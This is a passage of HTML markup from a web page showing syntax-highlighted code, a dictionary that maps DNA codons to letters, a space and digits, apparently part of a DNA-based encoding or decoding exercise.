pre;">'Q'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GGT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'R'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GTG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'S'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GTC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'T'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GTG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'U'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GTT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'V'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TAA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'W'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TAC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'X'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TAG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'Y'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TAT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'Z'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TTG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">' '</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TTC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'0'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TCA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'1'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TCC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'2'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TCG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'3'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TCT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'4'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TGA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'5'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TGC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'6'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TGG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'7'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TGT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'8'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> 